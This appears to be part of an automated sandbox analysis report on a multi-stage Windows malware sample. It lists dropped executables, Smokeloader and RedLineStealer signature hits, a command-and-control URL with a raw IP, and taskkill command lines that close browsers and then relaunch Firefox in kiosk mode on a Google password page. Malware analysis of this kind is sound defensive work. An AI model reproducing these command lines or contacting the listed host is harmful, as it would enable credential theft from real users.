                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: String function: 10003160 appears 34 times
                          Source: C:\Users\user\Desktop\file.exeCode function: String function: 00F580C0 appears 130 times
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: String function: 00414A30 appears 76 times
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: String function: 0023B97D appears 40 times
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: String function: 0022D9E0 appears 102 times
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: String function: 00408000 appears 52 times
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: String function: 00236C0B appears 42 times
                          Source: random[1].exe0.6.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: f30149f036.exe.6.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: 0000000C.00000002.3486058612.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                          Source: 0000000C.00000002.3478917233.0000000000F4D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                          Source: random[1].exe.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003383629931388
                          Source: random[1].exe.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003383629931388
                          Source: d0d9725343.exe.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003383629931388
                          Source: d0d9725343.exe.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003383629931388
                          Source: random[1].exe1.6.drStatic PE information: Section: ZLIB complexity 0.9974927011245674
                          Source: random[1].exe1.6.drStatic PE information: Section: hkjfghfg ZLIB complexity 0.9947554758308157
                          Source: 176986cc9c.exe.6.drStatic PE information: Section: ZLIB complexity 0.9974927011245674
                          Source: 176986cc9c.exe.6.drStatic PE information: Section: hkjfghfg ZLIB complexity 0.9947554758308157
                          Source: random[1].exe2.6.drStatic PE information: Section: jkfvjajp ZLIB complexity 0.9949263982704869
                          Source: f570600774.exe.6.drStatic PE information: Section: jkfvjajp ZLIB complexity 0.9949263982704869
                          Source: random[1].exe1.6.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                          Source: 176986cc9c.exe.6.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@55/31@28/14
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_00402A20 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,12_2_00402A20
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_00F4DBC6 CreateToolhelp32Snapshot,Module32First,12_2_00F4DBC6
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00436F90 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,11_2_00436F90
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exeJump to behavior
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1912:120:WilError_03
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4888:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1320:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5536:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5552:120:WilError_03
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4072:120:WilError_03
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCommand line argument: emp12_2_00408770
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCommand line argument: mixtwo12_2_00408770
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: d0d9725343.exe, 0000000B.00000003.2928546086.00000000037C8000.00000004.00000800.00020000.00000000.sdmp, d0d9725343.exe, 0000000B.00000003.2928725926.0000000003875000.00000004.00000800.00020000.00000000.sdmp, d0d9725343.exe, 0000000B.00000003.2904293300.00000000037C8000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3106760006.00000000057BB000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3106393177.00000000057DA000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3139507752.00000000057CD000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3246129095.00000000053EF000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3245145114.0000000005408000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3276845733.0000000005409000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: file.exeReversingLabs: Detection: 55%
                          Source: f30149f036.exeString found in binary or memory: /add?substr=
                          Source: f30149f036.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: f30149f036.exeString found in binary or memory: 80.82.65.70/add?substr=mixtwo&s=three&sub=emp
                          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe "C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeProcess created: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe "C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeProcess created: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe "C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exe "C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe "C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exe "C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe "C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exe "C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                          Source: unknownProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exe "C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exe"
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2352 -parentBuildID 20230927232528 -prefsHandle 2288 -prefMapHandle 2284 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {745b1038-6b91-4698-a3f0-64664cce277e} 1892 "\\.\pipe\gecko-crash-server-pipe.1892" 2149b56f910 socket
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exe "C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exe"
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4360 -parentBuildID 20230927232528 -prefsHandle 4316 -prefMapHandle 4328 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5763664d-1f38-4c19-9998-65a89666960a} 1892 "\\.\pipe\gecko-crash-server-pipe.1892" 214adcdc110 rdd
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exe "C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe "C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exe "C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe "C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exe "C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exe "C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exe "C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeProcess created: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe "C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeProcess created: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe "C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2352 -parentBuildID 20230927232528 -prefsHandle 2288 -prefMapHandle 2284 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {745b1038-6b91-4698-a3f0-64664cce277e} 1892 "\\.\pipe\gecko-crash-server-pipe.1892" 2149b56f910 socket
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4360 -parentBuildID 20230927232528 -prefsHandle 4316 -prefMapHandle 4328 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5763664d-1f38-4c19-9998-65a89666960a} 1892 "\\.\pipe\gecko-crash-server-pipe.1892" 214adcdc110 rdd
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: webio.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeSection loaded: winnsi.dllJump to behavior
